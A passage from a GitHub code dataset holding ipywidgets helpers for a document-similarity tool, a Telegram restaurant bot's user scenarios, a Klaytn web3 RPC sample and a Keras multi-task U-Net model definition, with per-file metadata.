description=''\n            )\n        \n        # widgets for selecting n\n        n_option = widgets.BoundedIntText(\n            value=value,\n            min=self.deduplication_df.index.min(),\n            max=self.deduplication_df.index.max(),\n            step=1,\n            description='',\n            disabled=False,\n            layout = widgets.Layout(width='150px')\n        )\n        \n        return enter_n, n_option\n    \n    \n    def select_options(self, \n                       instruction: str,\n                       options: list,\n                       value: str):\n        '''\n        Create widgets for selecting options\n        \n        Args:\n            instruction: text instruction for user\n            options: list of options for user\n            value: initial value of the widget\n        '''\n        # widget to display instruction\n        enter_text = widgets.HTML(\n            value=instruction,\n            placeholder='',\n            description=''\n            )\n        \n        # widget to select entity options\n        select_option = widgets.Dropdown(\n            options=options,\n            value=value,\n            description='',\n            disabled=False,\n            layout = widgets.Layout(width='150px')\n        )\n        \n        return enter_text, select_option\n    \n    \n    def click_button_widget(\n            self, \n            desc: str, \n            margin: str='10px 0px 0px 10px',\n            width='320px'\n    ):\n        '''\n        Create a widget to show a button to click\n        \n        Args:\n            desc: description to display on the button widget\n            margin: top, right, bottom and left margins for the button widget\n            width: the width of the button\n        '''\n        # widget to show the button to click\n        button = widgets.Button(description=desc, \n                                layout=Layout(margin=margin, width=width),\n                                style=dict(font_weight='bold'))\n        \n        # the output after clicking the button\n        out = widgets.Output()\n        \n        return button, out", "repo_name": "Australian-Text-Analytics-Platform/document-similarity", "sub_path": "document_similarity.py", "file_name": "document_similarity.py", "file_ext": "py", "file_size_in_byte": 52673, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": 
"github-code", "pt": "53", "api": [{"api_name": "bokeh.io.output_notebook", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.get_projectpaths", "line_number": 59, "usage_type": "call"}, {"api_name": "IPython.display.FileLink", "line_number": 62, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "html.escape", "line_number": 77, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 102, "usage_type": "call"}, {"api_name": "ipywidgets.FileUpload", "line_number": 105, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 110, "usage_type": "call"}, {"api_name": "ipywidgets.Output", "line_number": 113, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 120, "usage_type": "call"}, {"api_name": "ipywidgets.VBox", "line_number": 137, "usage_type": "call"}, {"api_name": "ipywidgets.Button", "line_number": 191, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 192, "usage_type": "call"}, {"api_name": "ipywidgets.Output", "line_number": 197, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 229, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 232, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 235, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 261, "usage_type": "call"}, {"api_name": "codecs.decode", "line_number": 266, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 286, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 290, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 292, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 305, "usage_type": "attribute"}, {"api_name": "hashlib.shake_256", "line_number": 313, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 340, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 345, "usage_type": "call"}, {"api_name": "os.system", "line_number": 355, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 358, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 358, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 394, "usage_type": "call"}, {"api_name": "tqdm.tqdm.pandas", "line_number": 401, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 401, "usage_type": "name"}, {"api_name": "datasketch.MinHashLSH", "line_number": 433, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 435, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 477, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 507, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 519, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 542, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 561, "usage_type": "call"}, {"api_name": "IPython.display.HTML", "line_number": 561, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 584, "usage_type": "attribute"}, {"api_name": "numpy.array_split", "line_number": 595, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 598, "usage_type": "call"}, {"api_name": "ipywidgets.Output", "line_number": 615, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 659, "usage_type": "call"}, {"api_name": 
"IPython.display.clear_output", "line_number": 669, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 675, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 686, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 691, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 702, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 712, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 724, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 728, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 734, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 749, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 751, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 759, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 763, "usage_type": "call"}, {"api_name": "{'escape': 'html.escape'}", "line_number": 763, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 770, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 770, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 771, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 771, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 772, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 772, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 773, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 773, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 774, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 774, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 775, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 775, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 776, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 776, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 778, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 778, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 779, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 779, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 780, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 780, "usage_type": "call"}, {"api_name": "ipywidgets.HBox", "line_number": 781, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 781, "usage_type": "call"}, {"api_name": "ipywidgets.VBox", "line_number": 783, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 789, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 810, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 820, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 822, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 831, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 833, "usage_type": "call"}, {"api_name": "os.path", "line_number": 833, "usage_type": "attribute"}, {"api_name": "os.path.relpath", "line_number": 834, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 834, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 834, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 835, "usage_type": "call"}, {"api_name": "os.path", "line_number": 835, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 837, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 837, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 841, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 846, "usage_type": "call"}, {"api_name": "{'escape': 'html.escape'}", "line_number": 846, "usage_type": "call"}, {"api_name": "ipywidgets.Output", "line_number": 857, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 862, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 872, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 888, "usage_type": "call"}, {"api_name": "ipywidgets.VBox", "line_number": 897, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 902, "usage_type": "attribute"}, {"api_name": "diffviz.html_diffs", "line_number": 922, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 924, "usage_type": "call"}, {"api_name": "IPython.display.HTML", "line_number": 924, "usage_type": "call"}, {"api_name": "gensim.utils.tokenize", "line_number": 934, "usage_type": "call"}, {"api_name": "nltk.ngrams", "line_number": 962, "usage_type": "call"}, {"api_name": "gensim.utils.tokenize", "line_number": 962, "usage_type": "call"}, {"api_name": "datasketch.MinHash", "line_number": 965, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1024, "usage_type": "attribute"}, {"api_name": "nltk.ngrams", "line_number": 1041, "usage_type": "call"}, {"api_name": "gensim.utils.tokenize", "line_number": 1041, "usage_type": "call"}, {"api_name": "nltk.ngrams", "line_number": 1053, "usage_type": "call"}, {"api_name": "gensim.utils.tokenize", "line_number": 1053, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1062, "usage_type": "attribute"}, {"api_name": "itertools.chain.from_iterable", "line_number": 1071, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 1071, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1074, "usage_type": "attribute"}, {"api_name": "seaborn.histplot", "line_number": 1084, "usage_type": "call"}, {"api_name": "bokeh.plotting.figure", "line_number": 1153, "usage_type": "call"}, {"api_name": "bokeh.transform.linear_cmap", "line_number": 1160, "usage_type": "call"}, {"api_name": "bokeh.models.ColumnDataSource", "line_number": 1173, "usage_type": "call"}, {"api_name": "bokeh.models.LabelSet", "line_number": 1174, "usage_type": "call"}, {"api_name": "bokeh.models.ColorBar", "line_number": 1189, "usage_type": "call"}, {"api_name": "bokeh.models.FuncTickFormatter", "line_number": 1208, "usage_type": "call"}, {"api_name": "bokeh.models.FuncTickFormatter", "line_number": 1209, "usage_type": "call"}, {"api_name": "bokeh.plotting.show", "line_number": 1216, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1220, "usage_type": "attribute"}, {"api_name": "ipywidgets.HTML", "line_number": 1263, "usage_type": "call"}, {"api_name": "ipywidgets.BoundedIntText", "line_number": 1270, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 1277, "usage_type": "call"}, {"api_name": "ipywidgets.HTML", "line_number": 
1296, "usage_type": "call"}, {"api_name": "ipywidgets.Dropdown", "line_number": 1303, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 1308, "usage_type": "call"}, {"api_name": "ipywidgets.Button", "line_number": 1329, "usage_type": "call"}, {"api_name": "ipywidgets.Layout", "line_number": 1330, "usage_type": "call"}, {"api_name": "ipywidgets.Output", "line_number": 1334, "usage_type": "call"}]}
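The record above wraps datasketch's MinHash/MinHashLSH behind widget plumbing; stripped of the UI, the near-duplicate pipeline it implements (shingle, hash, index, query, then estimate Jaccard) fits in a few lines. A minimal sketch, assuming datasketch is installed; the toy corpus and the 0.5 threshold are illustrative, not values taken from the record.

# Minimal MinHash + LSH near-duplicate sketch (assumes: pip install datasketch).
from datasketch import MinHash, MinHashLSH

docs = {
    'doc1': 'the quick brown fox jumps over the lazy dog',
    'doc2': 'the quick brown fox jumped over a lazy dog',
    'doc3': 'an entirely different sentence about minhash',
}
NUM_PERM = 256  # more permutations -> better Jaccard estimate, slower hashing

def minhash_of(text):
    # unigram shingles, matching the record's ngram_value=1 behaviour
    m = MinHash(num_perm=NUM_PERM)
    for token in set(text.split()):
        m.update(token.encode('utf8'))
    return m

hashes = {doc_id: minhash_of(text) for doc_id, text in docs.items()}

# index every document, then query for approximate neighbours above the threshold
lsh = MinHashLSH(threshold=0.5, num_perm=NUM_PERM)
for doc_id, m in hashes.items():
    lsh.insert(doc_id, m)

for doc_id, m in hashes.items():
    for other in lsh.query(m):
        if other != doc_id:
            print(doc_id, other, round(hashes[doc_id].jaccard(hashes[other]), 4))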
+{"seq_id": "24458780546", "text": "from typing import Optional, Callable\n\nfrom lib.scenario.base import Scenario\n\n\nclass RegisterUser(Scenario):\n    def get_name(self) -> str:\n        return \"Register\"\n\n    def start(self, message: \"telebot.types.Message\") -> Optional[Callable]:\n        send_id = message.from_user.id\n        self.bot.send_message(send_id, \"Enter your name\")\n        return self.finish_registration\n\n    def finish_registration(self, message: \"telebot.types.Message\") -> Optional[Callable]:\n        send_id = message.from_user.id\n\n        user_name = message.text\n\n        response = self.backend.add_user(telegram_id=send_id, user_name=user_name)\n\n        if response.status == 1:\n            self.bot.send_message(send_id, f\"Congratulations, {user_name}! You have been added to the Yerevan Restaurant network\")\n        else:\n            self.bot.send_message(send_id, \"Something went wrong, please try again\")\n\n\nclass ListUsers(Scenario):\n    def get_name(self) -> str:\n        return \"User list\"\n\n    def start(self, message: \"telebot.types.Message\") -> Optional[Callable]:\n        send_id = message.from_user.id\n\n        response = self.backend.get_users_list()\n        if response.status != 1:\n            self.bot.send_message(send_id, \"Something went wrong, please try again\")\n            return\n\n        user_names = [user[\"name\"] for user in response.answer]\n        if not user_names:\n            msg = \"The Yerevan Restaurant network user list is empty\"\n        else:\n            msg = \"Yerevan Restaurant network users:\\n\" + \"\\n\".join(user_names)\n\n        self.bot.send_message(send_id, msg)\n\n\nclass ChangeUserName(Scenario):\n    def get_name(self) -> str:\n        return \"Change name\"\n\n    def start(self, message: \"telebot.types.Message\") -> Optional[Callable]:\n        send_id = message.from_user.id\n        self.bot.send_message(send_id, \"What name would you like?\")\n        return self.change_name\n\n    def change_name(self, message: \"telebot.types.Message\") -> Optional[Callable]:\n        send_id = message.from_user.id\n\n        new_name = message.text\n        response = self.backend.change_user_name(send_id, new_name)\n\n        if response.status == 1:\n            self.bot.send_message(send_id, f\"Your name is now {new_name}\")\n        else:\n            self.bot.send_message(send_id, \"Something went wrong, please try again\")\n", "repo_name": "messiah1349/restaurants_bot", "sub_path": "lib/scenario/user.py", "file_name": "user.py", "file_ext": "py", "file_size_in_byte": 2603, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "lib.scenario.base.Scenario", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 15, "usage_type": "name"}, {"api_name": "lib.scenario.base.Scenario", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 32, "usage_type": "name"}, {"api_name": "lib.scenario.base.Scenario", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 58, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 58, "usage_type": "name"}]}
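The scenario classes in this record signal the next conversation step by returning a callable (or None) from each handler; the repository's dispatcher is not shown, so here is a hypothetical, framework-free sketch of how such return values can drive a two-step dialog. The Dispatcher and Message names are invented for illustration and are not part of the repository.

from typing import Callable, Optional

class Message:
    # stand-in for telebot.types.Message: just a user id and the text sent
    def __init__(self, user_id: int, text: str):
        self.user_id, self.text = user_id, text

class Dispatcher:
    def __init__(self):
        # pending next-step handler per user id
        self._next = {}

    def feed(self, message: Message, entry: Callable[[Message], Optional[Callable]]):
        # run the pending step for this user if one exists, otherwise the entry point;
        # whatever the step returns becomes the user's next pending step
        handler = self._next.pop(message.user_id, entry)
        follow_up = handler(message)
        if follow_up is not None:
            self._next[message.user_id] = follow_up

def ask_name(message: Message) -> Optional[Callable]:
    print('Enter your name')
    return save_name

def save_name(message: Message) -> Optional[Callable]:
    print(f'Hello, {message.text}!')
    return None

dispatcher = Dispatcher()
dispatcher.feed(Message(1, '/register'), ask_name)  # prints the prompt
dispatcher.feed(Message(1, 'Alice'), ask_name)      # prints 'Hello, Alice!'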
+{"seq_id": "16459885363", "text": "from web3 import Web3\nfrom web3py_ext import extend\n\nhost = \"https://api.baobab.klaytn.net:8651\"\n\nblockTag = \"0xe8\"\n\nw3 = Web3(Web3.HTTPProvider(host))\neth_response = w3.eth.get_uncle_count_by_block_number(blockTag)\n\nprint(eth_response)\n", "repo_name": "klaytn/web3klaytn", "sub_path": "web3rpc/rpc-specs/code-samples/python/eth/block/getUncleCountByBlockNumber.py", "file_name": "getUncleCountByBlockNumber.py", "file_ext": "py", "file_size_in_byte": 237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "53", "api": [{"api_name": "web3.Web3", "line_number": 8, "usage_type": "call"}, {"api_name": "web3.Web3.HTTPProvider", "line_number": 8, "usage_type": "call"}]}
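The sample above relies on web3py_ext to expose get_uncle_count_by_block_number; the same query can be issued as a raw JSON-RPC call through standard web3.py when the extension is unavailable. A small sketch: make_request is the standard provider method, the endpoint and block tag are copied from the sample, and decoding the hex quantity with int(..., 16) is the usual convention.

# same query via raw JSON-RPC, without the web3py_ext helper
from web3 import Web3

w3 = Web3(Web3.HTTPProvider("https://api.baobab.klaytn.net:8651"))
resp = w3.provider.make_request("eth_getUncleCountByBlockNumber", ["0xe8"])
print(int(resp["result"], 16))  # the node returns a hex quantity, e.g. "0x0"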
+{"seq_id": "17287407374", "text": "\"\"\"\nCreated on Mon Oct 17 17:24:42 2016\n@author: Ruobing Huang\n\"\"\"\n\nfrom __future__ import print_function\nfrom keras.models import Model\nfrom keras.layers import Input, merge, Convolution2D, MaxPooling2D, UpSampling2D\nfrom keras.layers import Dropout, Activation\nfrom keras.optimizers import SGD, RMSprop\nimport pdb\n\nimage_length =128\nimage_width =128\nimage_height =128\n\ndef get_unet():\n inputs = Input((image_length, image_width, image_height), name = 'input')\n conv1 = Convolution2D(128, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(inputs)\n conv1 = Convolution2D(128, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n\n conv2 = Convolution2D(256, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(pool1)\n conv2 = Convolution2D(256, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n \n conv3 = Convolution2D(512, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(pool2)\n conv3 = Convolution2D(512, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n \n # ==========================================================================\n conv4 = Convolution2D(512, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(pool3)\n drop4 = Dropout(0.5)(conv4)\n conv4 = Convolution2D(512, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(drop4)\n conv4 = Dropout(0.5)(conv4)\n # ==========================================================================\n # Task 1\n # ==========================================================================\n t1_conv5 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(conv4)\n t1_act5 = merge([UpSampling2D(size=(2, 2))(t1_conv5), conv3], mode='concat', concat_axis= -1)\n \n t1_conv6 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(t1_act5)\n t1_act6 = merge([UpSampling2D(size=(2, 2))(t1_conv6), conv2], mode='concat', concat_axis= -1)\n \n t1_pred = Convolution2D(1, 1, 1, activation='sigmoid',dim_ordering = 'tf',init='orthogonal', name='task1_output')(t1_act6)\n # ==========================================================================\n # Task 2\n # ==========================================================================\n t2_conv5 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(conv4)\n t2_act5 = merge([UpSampling2D(size=(2, 2))(t2_conv5), conv3], mode='concat', concat_axis= -1)\n \n t2_conv6 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(t2_act5)\n t2_act6 = merge([UpSampling2D(size=(2, 2))(t2_conv6), conv2], mode='concat', concat_axis= -1)\n \n t2_pred = Convolution2D(1, 1, 1, activation='sigmoid',dim_ordering = 'tf',init='orthogonal', name='task2_output')(t2_act6)\n # ==========================================================================\n # Task 3\n # ==========================================================================\n t3_conv5 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 
'tf',border_mode='same')(conv4)\n t3_act5 = merge([UpSampling2D(size=(2, 2))(t3_conv5), conv3], mode='concat', concat_axis= -1)\n \n t3_conv6 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(t3_act5)\n t3_act6 = merge([UpSampling2D(size=(2, 2))(t3_conv6), conv2], mode='concat', concat_axis= -1)\n\n t3_pred = Convolution2D(1, 1, 1, activation='sigmoid',dim_ordering = 'tf',init='orthogonal', name='task3_output')(t3_act6)\n # ==========================================================================\n # Task 4\n # ==========================================================================\n t4_conv5 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(conv4)\n t4_act5 = merge([UpSampling2D(size=(2, 2))(t4_conv5), conv3], mode='concat', concat_axis= -1)\n \n t4_conv6 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(t4_act5)\n t4_act6 = merge([UpSampling2D(size=(2, 2))(t4_conv6), conv2], mode='concat', concat_axis= -1)\n \n t4_pred = Convolution2D(1, 1, 1, activation='sigmoid',dim_ordering = 'tf',init='orthogonal', name='task4_output')(t4_act6)\n \n # ==========================================================================\n # Task 5\n # ==========================================================================\n t5_conv5 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(conv4)\n t5_act5 = merge([UpSampling2D(size=(2, 2))(t5_conv5), conv3], mode='concat', concat_axis= -1)\n \n t5_conv6 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(t5_act5)\n t5_act6 = merge([UpSampling2D(size=(2, 2))(t5_conv6), conv2], mode='concat', concat_axis= -1)\n \n t5_pred = Convolution2D(1, 1, 1, activation='sigmoid',dim_ordering = 'tf',init='orthogonal',name='task5_output')(t5_act6)\n # ==========================================================================\n model = Model(input = inputs, output= [t1_pred, t2_pred, t3_pred, t4_pred, t5_pred])\n # ==========================================================================\n opt = RMSprop(lr = 1e-3)\n model.compile(optimizer = opt,\n loss={'task1_output': 'binary_crossentropy',\n 'task2_output': 'binary_crossentropy',\n 'task3_output': 'binary_crossentropy',\n 'task4_output': 'binary_crossentropy',\n 'task5_output': 'binary_crossentropy'},\n metrics={'task1_output': 'acc',\n 'task2_output': 'acc',\n 'task3_output': 'acc',\n 'task4_output': 'acc',\n 'task5_output': 'acc'},\n loss_weights = {'task1_output': 1,\n 'task2_output': 1,\n 'task3_output': 1,\n 'task4_output': 1,\n 'task5_output': 1})\n return model", "repo_name": "cloudy-toast/Multi_S_CNN", "sub_path": "build_multi_model.py", "file_name": "build_multi_model.py", "file_ext": "py", "file_size_in_byte": 6918, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "keras.layers.Input", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 19, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 20, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 23, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 24, "usage_type": "call"}, 
{"api_name": "keras.layers.MaxPooling2D", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 27, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 29, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 39, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 43, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 43, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 53, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 53, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 55, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 59, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 60, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 60, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 65, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 69, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 70, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 70, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 72, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 80, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 83, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 86, "usage_type": "call"}, 
{"api_name": "keras.models.Model", "line_number": 88, "usage_type": "call"}, {"api_name": "keras.optimizers.RMSprop", "line_number": 90, "usage_type": "call"}]}
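The model in this record is written against the long-deprecated Keras 1 API (Convolution2D, merge, dim_ordering, init). A sketch of the same shared-encoder, five-decoder-heads layout in current tf.keras follows; filter counts, input shape, and the per-task loss dictionary mirror the record, but this is an illustrative port under those assumptions, not code from the repository.

# shared encoder + per-task decoder heads in current tf.keras
from tensorflow.keras import Model
from tensorflow.keras.layers import (Input, Conv2D, MaxPooling2D,
                                     UpSampling2D, Dropout, concatenate)
from tensorflow.keras.optimizers import RMSprop

inputs = Input((128, 128, 128), name='input')
c1 = Conv2D(128, 3, activation='relu', padding='same')(inputs)
c1 = Conv2D(128, 3, activation='relu', padding='same')(c1)
p1 = MaxPooling2D(2)(c1)
c2 = Conv2D(256, 3, activation='relu', padding='same')(p1)
c2 = Conv2D(256, 3, activation='relu', padding='same')(c2)
p2 = MaxPooling2D(2)(c2)
c3 = Conv2D(512, 3, activation='relu', padding='same')(p2)
c3 = Conv2D(512, 3, activation='relu', padding='same')(c3)
p3 = MaxPooling2D(2)(c3)
c4 = Dropout(0.5)(Conv2D(512, 3, activation='relu', padding='same')(p3))
c4 = Dropout(0.5)(Conv2D(512, 3, activation='relu', padding='same')(c4))

def task_head(name):
    # per-task decoder: upsample twice, with skip connections into c3 and c2
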